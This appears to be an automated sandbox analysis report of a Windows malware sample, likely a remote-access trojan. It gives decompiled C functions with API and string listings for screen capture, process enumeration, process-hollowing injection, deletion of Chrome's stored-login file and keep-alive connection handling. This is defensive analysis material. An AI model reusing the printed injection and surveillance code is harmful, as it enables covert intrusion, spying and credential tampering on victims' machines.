                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          										__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v40, 0xe);
                                          										__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v56);
                                          										__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t155, 0x28);
                                          										__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v56);
                                          										__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t131, _t155->bmiHeader.biSizeImage);
                                          										__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v56);
                                          										DeleteObject(_v20);
                                          										GlobalFree(_t131);
                                          										DeleteDC(_v24);
                                          										DeleteDC(_v12);
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v72);
                                          										__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          										__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									} else {
                                          										_t126 =  &_v5;
                                          										goto L24;
                                          									}
                                          								} else {
                                          									_t126 =  &_v5;
                                          									goto L24;
                                          								}
                                          							} else {
                                          								_t126 =  &_v5;
                                          								goto L24;
                                          							}
                                          						} else {
                                          							_t126 =  &_v5;
                                          							goto L24;
                                          						}
                                          					} else {
                                          						_t126 =  &_v5;
                                          						goto L24;
                                          					}
                                          				} else {
                                          					_t126 =  &_v5;
                                          					L24:
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0, _t126);
                                          				}
                                          				return _a4;
                                          			}

                                          0x0040d737
                                          0x0040d73a
                                          0x0040d74c
                                          0x0040d754
                                          0x0040d759
                                          0x0040d760
                                          0x0040d768
                                          0x0040d76b
                                          0x0040d776
                                          0x0040d781
                                          0x0040d7a8
                                          0x0040d7c3
                                          0x0040d7d0
                                          0x0040d7d8
                                          0x0040d7e3
                                          0x0040d7e7
                                          0x00000000
                                          0x0040d7ed
                                          0x0040d7ef
                                          0x0040d7f3
                                          0x00000000
                                          0x0040d7f9
                                          0x0040d7fb
                                          0x0040d7ff
                                          0x00000000
                                          0x0040d801
                                          0x0040d805
                                          0x0040d87a
                                          0x00000000
                                          0x0040d807
                                          0x0040d809
                                          0x0040d80a
                                          0x0040d80a
                                          0x0040d805
                                          0x0040d7ff
                                          0x0040d7f3
                                          0x0040d7da
                                          0x0040d7da
                                          0x0040d87c
                                          0x0040d87c
                                          0x0040d87d
                                          0x0040d881
                                          0x0040d88b
                                          0x0040d88b
                                          0x0040d814
                                          0x0040d81a
                                          0x0040d823
                                          0x0040d829
                                          0x0040d830
                                          0x0040d838
                                          0x0040d83c
                                          0x0040d842
                                          0x0040d845
                                          0x0040d845
                                          0x0040d850
                                          0x0040d851
                                          0x0040d857
                                          0x0040d85a
                                          0x0040d860
                                          0x0040d866
                                          0x0040d86f
                                          0x0040d873
                                          0x0040d8a8
                                          0x0040d8bd
                                          0x0040d8ce
                                          0x0040d8d2
                                          0x0040d8da
                                          0x0040d8e9
                                          0x0040d8f0
                                          0x0040d8fd
                                          0x0040d90c
                                          0x0040d919
                                          0x0040d925
                                          0x0040d932
                                          0x0040d93f
                                          0x0040d94c
                                          0x0040d955
                                          0x0040d95c
                                          0x0040d96b
                                          0x0040d970
                                          0x0040d979
                                          0x0040d982
                                          0x0040d98b
                                          0x0040d8aa
                                          0x0040d8aa
                                          0x00000000
                                          0x0040d8aa
                                          0x0040d875
                                          0x0040d875
                                          0x00000000
                                          0x0040d875
                                          0x0040d7c5
                                          0x0040d7c5
                                          0x00000000
                                          0x0040d7c5
                                          0x0040d7aa
                                          0x0040d7aa
                                          0x00000000
                                          0x0040d7aa
                                          0x0040d783
                                          0x0040d783
                                          0x00000000
                                          0x0040d783
                                          0x0040d76d
                                          0x0040d76d
                                          0x0040d8ad
                                          0x0040d8b2
                                          0x0040d8b2
                                          0x0040d998

                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                                          • CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                                          • CreateCompatibleBitmap.GDI32(00000000,74B06490,00000000), ref: 0040D760
                                          • SelectObject.GDI32(@YA,00000000), ref: 0040D779
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8F0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8FD
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E,?,00000000), ref: 0040D90C
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D919
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028,?,00000000), ref: 0040D925
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D932
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D93F
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D94C
                                          • DeleteObject.GDI32(?), ref: 0040D955
                                          • GlobalFree.KERNEL32 ref: 0040D95C
                                          • DeleteDC.GDI32(?), ref: 0040D96B
                                          • DeleteDC.GDI32(?), ref: 0040D970
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D979
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D982
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D98B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@V01@@$?assign@?$basic_string@CreateD@1@@DeleteV01@V12@Y?$basic_string@$??1?$basic_string@CapsCompatibleDeviceObject$BitmapFreeGlobalSelect
                                          • String ID: @YA$DISPLAY
                                          • API String ID: 2042352699-3806539182
                                          • Opcode ID: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                                          • Instruction ID: 01507db8c7ea154ffe35bb8a62b7e06070cb60eb7de7f760769c3134c364176c
                                          • Opcode Fuzzy Hash: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                                          • Instruction Fuzzy Hash: 3F813E75900209AFDB10DFA1DC88EDEBBB8FF48700F10842AF556E7190E775AA49CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004081C8
                                            • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                                            • Part of subcall function 0040F0B5: IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004081DC
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 004081F5
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00408202
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415268,00000002,00000000), ref: 00408223
                                            • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                                            • Part of subcall function 0040F0DF: IsWow64Process.KERNEL32(00000000,?,?,00407F70,?), ref: 0040F100
                                            • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                            • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                            • Part of subcall function 0040F16A: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040F17D
                                            • Part of subcall function 0040F16A: GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0040F192
                                            • Part of subcall function 0040F16A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040F1B5
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 0040829E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082AE
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082BB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158), ref: 004082CB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411158,00000000), ref: 004082D8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004082E8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082F5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00408305
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408311
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040831D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408326
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408332
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040833B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408347
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408350
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040835C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408365
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040836E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040837A
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408386
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408392
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040839E
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083A7
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 004083B5
                                          • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 004083C4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004083D1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004083DA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$Process$V10@V10@0@$D@1@@Process32V01@@$?c_str@?$basic_string@?length@?$basic_string@G@1@@NextOpenWow64$??4?$basic_string@CloseCreateCurrentFileFirstHandleModuleNameSnapshotToolhelp32V01@_itoa
                                          • String ID:
                                          • API String ID: 2310449240-0
                                          • Opcode ID: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                                          • Instruction ID: 59879eeb23424d9b9582fbd1b4132700e7662ed198339718a96ed2a8ede2f5f3
                                          • Opcode Fuzzy Hash: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                                          • Instruction Fuzzy Hash: 7A51EF7190011EABCB15EBA1DD4AEDEB77CAF54308F1044B6B506B2051EE789F4D8F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E0040D477() {
                                          				void* _t63;
                                          				void* _t64;
                                          				void _t76;
                                          				void* _t77;
                                          				signed int _t79;
                                          				intOrPtr _t90;
                                          				CONTEXT* _t98;
                                          				signed int _t100;
                                          				void* _t103;
                                          				long _t112;
                                          				intOrPtr* _t117;
                                          				void* _t118;
                                          				void* _t120;
                                          
                                          				L0040FCDE();
                                          				 *((intOrPtr*)(_t118 - 0x10)) = _t120 - 0x7c;
                                          				 *(_t118 - 4) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x84)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                          				_t63 =  *(_t118 + 0xc);
                                          				 *(_t118 - 0x80) = _t63;
                                          				if( *_t63 != 0x5a4d) {
                                          					L12:
                                          					 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
                                          					_t64 = 0;
                                          				} else {
                                          					_t117 =  *((intOrPtr*)(_t63 + 0x3c)) + _t63;
                                          					 *((intOrPtr*)(_t118 - 0x14)) = _t117;
                                          					if( *_t117 != 0x4550) {
                                          						goto L12;
                                          					} else {
                                          						_t100 = 0x11;
                                          						memset(_t118 - 0x5c, 0, _t100 << 2);
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_push(_t118 - 0x7c);
                                          						_push(_t118 - 0x5c);
                                          						_push(0);
                                          						_push(0);
                                          						_t112 = 4;
                                          						if(CreateProcessA(0,  *(_t118 + 8), 0, 0, 0, _t112, ??, ??, ??, ??) == 0) {
                                          							goto L12;
                                          						} else {
                                          							_t98 = VirtualAlloc(0, _t112, 0x1000, _t112);
                                          							 *(_t118 - 0x6c) = _t98;
                                          							_t98->ContextFlags = 0x10007;
                                          							if(GetThreadContext( *(_t118 - 0x78), _t98) == 0) {
                                          								goto L12;
                                          							} else {
                                          								ReadProcessMemory( *(_t118 - 0x7c), _t98->Ebx + 8, _t118 - 0x18, _t112, 0);
                                          								_t76 =  *(_t118 - 0x18);
                                          								if(_t76 ==  *(_t117 + 0x34)) {
                                          									 *((intOrPtr*)(_t118 - 0x84))( *(_t118 - 0x7c), _t76);
                                          								}
                                          								_t77 = VirtualAllocEx( *(_t118 - 0x7c),  *(_t117 + 0x34),  *(_t117 + 0x50), 0x3000, 0x40);
                                          								 *(_t118 - 0x68) = _t77;
                                          								if(_t77 == 0) {
                                          									goto L12;
                                          								} else {
                                          									WriteProcessMemory( *(_t118 - 0x7c), _t77,  *(_t118 + 0xc),  *(_t117 + 0x54), 0);
                                          									_t79 = 0;
                                          									 *(_t118 - 0x60) = 0;
                                          									while(_t79 < ( *(_t117 + 6) & 0x0000ffff)) {
                                          										_t103 =  *(_t118 + 0xc);
                                          										_t90 =  *((intOrPtr*)(_t103 + 0x3c)) + (_t79 + _t79 * 4) * 8 + _t103 + 0xf8;
                                          										 *((intOrPtr*)(_t118 - 0x64)) = _t90;
                                          										WriteProcessMemory( *(_t118 - 0x7c),  *((intOrPtr*)(_t90 + 0xc)) +  *(_t118 - 0x68),  *((intOrPtr*)(_t90 + 0x14)) + _t103,  *(_t90 + 0x10), 0);
                                          										 *(_t118 - 0x60) =  *(_t118 - 0x60) + 1;
                                          										_t79 =  *(_t118 - 0x60);
                                          									}
                                          									WriteProcessMemory( *(_t118 - 0x7c), _t98->Ebx + 8, _t117 + 0x34, 4, 0);
                                          									_t98->Eax =  *((intOrPtr*)(_t117 + 0x28)) +  *(_t118 - 0x68);
                                          									SetThreadContext( *(_t118 - 0x78), _t98);
                                          									if(ResumeThread( *(_t118 - 0x78)) == 0xffffffff) {
                                          										goto L12;
                                          									} else {
                                          										_t64 = 1;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
                                          				return _t64;
                                          			}

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 0040D47C
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00000000,00000000,74B5F560), ref: 0040D499
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040D4A0
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040D4F7
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040D50D
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0040D522
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D544
                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040D56C
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040D58F
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040D5C9
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D5E8
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0040D5FA
                                          • ResumeThread.KERNEL32(?), ref: 0040D603
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                          • String ID: NtUnmapViewOfSection$ntdll.dll
                                          • API String ID: 65594003-1050664331
                                          • Opcode ID: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                                          • Instruction ID: 491b69bf14096d3796cb56c0b3543e1f41dcebd31bc2b04dfda4688c6db47199
                                          • Opcode Fuzzy Hash: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                                          • Instruction Fuzzy Hash: C1515E71900208AFDB209FA4DC45FAEBBB9FF48314F10842AFA15E72A1D7759944DF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • getenv.MSVCRT ref: 00405637
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00405642
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040564D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405658
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00405661
                                          • DeleteFileA.KERNEL32(00000000), ref: 00405668
                                          • GetLastError.KERNEL32 ref: 00405672
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],?,?,?,?,00000000), ref: 00405693
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056A6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],?,?,?,?,00000000), ref: 004056CC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056E1
                                          Strings
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040562C
                                          • UserProfile, xrefs: 00405632
                                          • [Chrome StoredLogins not found], xrefs: 0040568E
                                          • [Chrome StoredLogins found, cleared!], xrefs: 004056C7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 3740952235-1062637481
                                          • Opcode ID: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                                          • Instruction ID: 4f69eec6fecf3c2889a810bfc1713c7a18bd464deb3961be00d6ef52500a67c9
                                          • Opcode Fuzzy Hash: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                                          • Instruction Fuzzy Hash: F0116331640509ABD700ABE4DD1EAFE7778EB54305F504477E402F21D0EEB95E88CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E00402832(void* __ecx) {
                                          				char _v5;
                                          				struct _SYSTEMTIME _v24;
                                          				char _v40;
                                          				void* _v56;
                                          				char* _t29;
                                          				char* _t30;
                                          				void* _t38;
                                          				intOrPtr _t46;
                                          
                                          				_t38 = __ecx;
                                          				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
                                          				if( *((intOrPtr*)(__ecx + 0x38)) <= 0) {
                                          					L3:
                                          					if( *((intOrPtr*)(_t38 + 0x35)) == 0) {
                                          						_t46 =  *0x415938; // 0x0
                                          						if(_t46 != 0) {
                                          							GetLocalTime( &_v24);
                                          							_t29 =  &_v5;
                                          							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
                                          							_t30 =  &_v40;
                                          							L0040FC20();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
                                          							_t21 = printf(_t30);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						}
                                          						E004021C7(_t21, _t38);
                                          					}
                                          					L7:
                                          					 *((char*)(_t38 + 0x34)) = 0;
                                          					 *((char*)(_t38 + 0x35)) = 0;
                                          					return 0;
                                          				}
                                          				while( *((intOrPtr*)(_t38 + 0x35)) == 0) {
                                          					Sleep(0x3e8);
                                          					 *(_t38 + 0x3c) =  *(_t38 + 0x3c) + 1;
                                          					_t21 =  *(_t38 + 0x3c);
                                          					if( *(_t38 + 0x3c) <  *((intOrPtr*)(_t38 + 0x38))) {
                                          						continue;
                                          					}
                                          					goto L3;
                                          				}
                                          				goto L7;
                                          			}

                                          APIs
                                          • Sleep.KERNEL32(000003E8), ref: 00402854
                                          • GetLocalTime.KERNEL32(?), ref: 00402876
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 004028A1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004028AC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004028B6
                                          • printf.MSVCRT ref: 004028BD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028C9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028D2
                                          Strings
                                          • Timeout expired, resetting connection., xrefs: 00402896
                                          • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 0040289C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout expired, resetting connection.
                                          • API String ID: 2756237499-72633004
                                          • Opcode ID: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
